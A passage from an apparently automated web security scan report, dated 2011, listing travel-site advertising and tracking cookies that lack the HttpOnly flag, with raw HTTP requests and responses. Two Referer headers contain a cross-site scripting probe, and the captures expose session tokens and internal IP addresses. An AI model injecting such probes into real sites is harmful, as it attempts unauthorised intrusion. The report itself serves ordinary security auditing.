fsguid=5860EEFA281121EC93852AEC182A3278&estara_firsttime=1317600765&location=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchResults.do%3Fjsk%3D4663010a5564010a20111003003755e18011569968%26key%3Dgtaqdik9%26showDP%3Dy%26NYOPRedirNI%3Dnull&dnc=131760243799780739 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:41 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Cache-Control: private, max-age=2592000
Set-Cookie: fsserver__SESSION__=s-5201.estara.com; path=/fs; domain=.estara.com
Set-Cookie: fsserver__SESSION____SECURE__=s-5201.estara.com; path=/fs; domain=.estara.com; secure
Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8iYRfBnjTm0AKidBJJtijrikiNQKoSbqAbREwl5IF4OIJ.KJeqKekCc0SAYVI1V0Ulo0cqowUloxyC4aSSDB3A7RSbnSo9IqBkFP0AhJTqOgphyDcY-KRvmTklrwoXpwUUF9cMmmyZm8c0yvznFyjpOzeufSQvH9FOsAIoYx0qbMJkxHhOmIMBUWfGGCEVwdVY08BnF5u-JMJ6buRpSP7hXhPw__; expires=Sat, 01-Oct-2016 00:40:41 GMT; path=/; domain=.estara.com
Expires: Wed, 02 Nov 2011 00:40:41 GMT
Content-Length: 26085
Content-Type: text/javascript; charset=UTF-8

eStara_obscuration['87123']='bookCreditCardNumber';eStara_obscuration['72139']='offer(.*)CREDIT_CARD_NUM|offer(.*)credit_card|offer(.*)CREDIT_CARD_NUM(.*)';eStara_obscuration['72149']='offer(.*)EXPIRA
...[SNIP]...

14.5. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=p&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&lang=en&cc=US HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=29F46A6CB42B71BC5130159228D86761.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;

14.6. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=2&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD863729C172E3809E90E563D50004A1.p0520; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.54
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe2() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...

14.7. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd&returnDate=yyyyc880d& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=EFC80F94270639BE94C078280756EC4C.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...

14.8. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:48 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 51092

function DrfUtils() {}

DrfUtils.regexEscape = function(text) {
return text.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, "\\$&");
}
DrfUtils.isFFCompat = function() {
   if (document.addEventListener)
...[SNIP]...

14.9. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=363DEDDF73A993F4C60B78F29DDE0D70.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:48 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 473

DrfCalendar.i18n = {
   shortDayNames: [ "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"],
   dayNames: ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"],
   monthNames: ["Ja
...[SNIP]...

14.10. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=C0501070F6ED78D85CD7AA691728D8A2.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 1995

.drf-aa {background-position:-90px 0px;}
.drf-aavaca {background-position:-180px 0px;}
.drf-agoda {background-position:-270px 0px;}
.drf-aircanada {background-position:-360px 0px;}
.drf-airfare {b
...[SNIP]...

14.11. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD319AB033A4436E8A201300E0F85D78.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Content-Length: 95623
Connection: close
Content-Type: image/png

.PNG
.
...IHDR................-...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

14.12. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E7500CA14FDE215C024D31D0E17145B0.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=C48818E7B47F8EDDDEDEE13932368B50.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Content-Length: 1291
Connection: close
Content-Type: image/gif

GIF89a|.......A#.2..............K8....=8. ..6..+..*.....%..=..I.."..XQ.@;.).,.......K1.)    .    .....~m.9 .!..2..9..:..J8.B@.E).9..?".;&.B%.;..#........ ..!.....5..I&.3..D&.9%.=%.+..=........I(.&........
...[SNIP]...

14.13. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=42D836FDA1F37A442DDD521D91ED4575.p0529

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=E7500CA14FDE215C024D31D0E17145B0.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 513


function setupLargeBottomHPU(drfAd) {    
   var advertiserRenderer = new AdvertiserRenderer(drfAd);
   var configurer = new WidgetInitializer(drfAd, advertiserRenderer);
   configurer.setup(9, 742, "TVLY
...[SNIP]...

14.14. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=96CD86B744253E4B0A2E3CFE8BABE276.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=C1A177F6DDA538A9AC81F0BDDD440587.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 6336

#drf_popunderHPU {
   color: #000000;
   background-color: #f3ae07;
   background: #ffffff;
   width: 300px;
   height:600px;
   font-family: calibri, arial, sans-serif;
   text-align: left;
   font-size: 13p
...[SNIP]...

14.15. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C48818E7B47F8EDDDEDEE13932368B50.p0527

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 13952


function WidgetInitializer(drfAd, advertiserRenderer) {
   this.drfAd = drfAd;
   this.advertiserRenderer = advertiserRenderer;
}

WidgetInitializer.prototype.setup = function (advertisersNumber, w
...[SNIP]...

14.16. http://event.adxpose.com/event.flow

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-0666653885873574%26output%3Dhtml%26h%3D250%26slotname%3D7372794801%26w%3D300%26ea%3D0%26flash%3D10.3.183%26url%3Dhttp%253A%252F%252Fads.pubmatic.com%252Fhosteddefaulttags%252F26620%252F26621%252F21556%252F559%252Fadtag.html%26dt%3D1317606797018%26bpp%3D7%26shv%3Dr20110921%26jsv%3Dr20110914%26correlator%3D1317606797027%26frm%3D8%26adk%3D4114293891%26ga_vid%3D1069027809.1317606797%26ga_sid%3D1317606797%26ga_hid%3D1887245699%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D8%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D23%26u_nmime%3D106%26dff%3Dtimes%2520new%2520roman%26dfs%3D16%26adx%3D0%26ady%3D0%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D2019610879%26loc%3Dhttp%253A%252F%252Fads.pubmatic.com%252FHostedDefaultTags%252F26620%252F26621%252F21556%252F559%252Fadtag.html%26prodhost%3Dgoogleads.g.doubleclick.net%26fu%3D0%26ifi%3D1%26dtd%3D12&uid=eaa3bCBGoZRHY9Na_666924&xy=0%2C0&wh=300%2C250&vchannel=117962&iad=1317606801324-71110734669491650&cookieenabled=1&screenwh=1920%2C1200